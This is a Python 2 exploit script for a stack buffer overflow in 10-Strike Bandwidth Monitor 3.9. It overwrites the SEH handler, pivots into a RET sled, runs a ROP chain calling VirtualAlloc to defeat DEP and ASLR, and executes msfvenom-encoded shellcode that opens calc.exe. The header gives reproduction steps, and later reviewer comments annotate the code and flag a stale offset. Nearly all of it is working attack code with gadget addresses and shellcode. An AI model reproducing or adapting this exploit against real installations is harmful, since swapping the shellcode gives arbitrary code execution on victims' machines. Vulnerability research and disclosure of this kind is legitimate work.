# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Overwrite the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; the SafeSEH check does not apply because that module was not compiled with SafeSEH protection.
# 2. The Stack-Pivot lands in a RET Sled, because the buffer's offset on the Stack differs from run to run.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using Return-Oriented Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 is replaced with \x20 (space); \x0D and \x0A truncate the buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
# 400 bytes of 0x41 ('A') that open the buffer (see the final layout below);
# presumably just filler that sits below where the pivot lands -- TODO confirm
OS_retSled = '\x41'*400
# RET sled: 100 copies of the little-endian address 0x11060124, a `retn` in
# LIBEAY32.dll on an executable page. The pivot lands at a different offset on
# every run (header: 644..696, all multiples of 4, so each landing point is a
# whole address), and each `retn` slides forward until the ROP chain that
# follows is reached. This only works because LIBEAY32.dll loads at a fixed
# base (no ASLR/rebase, per the module table above); rebuilding it with
# /DYNAMICBASE would invalidate the sled address.
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
    """Return the packed ROP chain that calls VirtualAlloc and returns into the NOP sled.

    The list below is the mona.py output: one 32-bit little-endian DWORD per
    entry, consumed by successive RETN gadgets. Register set-up, as shown by
    the register/stack dump in the header comments:
      EBP = 0x1202ef02  POP EBP # RETN; becomes the return address after
                        VirtualAlloc, so the DWORD that follows is skipped
      EBX = 1           dwSize            (0xffffffff + two INC EBX)
      EDX = 0x1000      flAllocationType  (NEG 0xffffefff = 0x1001, then DEC)
      ECX = 0x40        flProtect         (0xffffffff + 65 INC ECX)
      EDI = RETN        ROP NOP
      ESI = JMP [EAX]   the jump into VirtualAlloc
      EAX = 0x110e7198  IAT slot in LIBEAY32.dll holding &VirtualAlloc
    PUSHAD # RETN then lays those registers out as the VirtualAlloc frame, and
    the final entry (push esp # ret) lands in the NOP sled the caller appends.

    Returns:
        str: the chain as raw bytes. Python 2 only -- under Python 3
        struct.pack() yields bytes and ''.join() raises TypeError.

    Every address here relies on ssleay32.dll, BandMonitor.exe and
    LIBEAY32.dll loading without ASLR/rebase (module table in the header);
    rebuilding those modules with /DYNAMICBASE and /SAFESEH breaks the chain.
    """
    # rop chain generated with mona.py - www.corelan.be
    ropGadgets = [
        # EBP: return address used after VirtualAlloc (skips one DWORD)
        0x1202ef02, # POP EBP # RETN [ssleay32.dll]
        0x1202ef02, # skip 4 bytes [ssleay32.dll]
        # EBX: 0xffffffff + 2 = 1 (dwSize)
        0x01215f16, # POP EBX # RETN [BandMonitor.exe]
        0xffffffff, #
        0x012175f5, # INC EBX # RETN [BandMonitor.exe]
        0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
        # EDX: NEG(0xffffefff) = 0x1001, DEC -> 0x1000 (MEM_COMMIT)
        0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
        0xffffefff, # Value to negate, destination value : 0x00001000
        0x01218952, # NEG EDX # RETN [BandMonitor.exe]
        0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
        # ECX: 0xffffffff + 65 x INC ECX = 0x40 (PAGE_EXECUTE_READWRITE)
        0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
        0xffffffff, #
        0x11016023, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
        # EDI / ESI / EAX: ROP NOP, the jump through the IAT, and the IAT slot
        0x1202fe55, # POP EDI # RETN [ssleay32.dll]
        0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
        0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
        0x110495ef, # JMP [EAX] [LIBEAY32.dll]
        0x012126f5, # POP EAX # RETN [BandMonitor.exe]
        0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
        # PUSHAD builds the call frame; the last entry is reached after the
        # POP EBP # RETN return address skips the IAT slot
        0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
        0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    # '<I' = 32-bit little-endian, one DWORD per gadget/value
    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
# 100 x 0x90 (NOP); the chain's final entry (push esp # ret) lands here
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
# 20 lines x 11 bytes = 220 bytes of encoded shellcode. Note the b"" literal is
# concatenated with str values below; that only works because this is Python 2,
# where both are the same type.
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
# Filler so that nSEH starts at a fixed offset. 600+200 equals the 800 bytes of
# OS_retSled + retSled defined above, so nSEH begins 4188 bytes into the buffer.
# NOTE(review): spelling it as 4188-len(OS_retSled+retSled+ropChain+nopSled+shellcode)
# would make that dependency explicit instead of a pair of magic numbers.
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
# 4-byte nSEH placeholder; presumably never executed, since control is taken
# through the pivot gadget placed in SEH rather than a short jump here -- TODO confirm
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
# NOTE(review): the line above says 1408/0x580 but the gadget comment below says
# 2064/0x810; one of the two is stale -- confirm against the binary.
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
# trailing padding after the SEH record
extra = '\x44'*2000
# Final layout, first byte to last:
#   OS_retSled | retSled | ropChain | nopSled | shellcode | OS_nSEH | nSEH | SEH | extra
# (the name `buffer` shadows a Python 2 builtin; harmless here)
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
    payload = buffer
    # Text mode ('w') on Windows rewrites '\n' as '\r\n'; that is harmless here
    # only because \x0a was excluded as a bad character above -- 'wb' would be
    # the safe choice.
    f = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    # NOTE(review): bare except hides the real error (e.g. permission denied),
    # and if write() raises the file is never closed; `except IOError as e:`
    # plus a `with open(...)` block would fix both. `print` statement syntax:
    # this script is Python 2 only.
    print File + ' failed to create'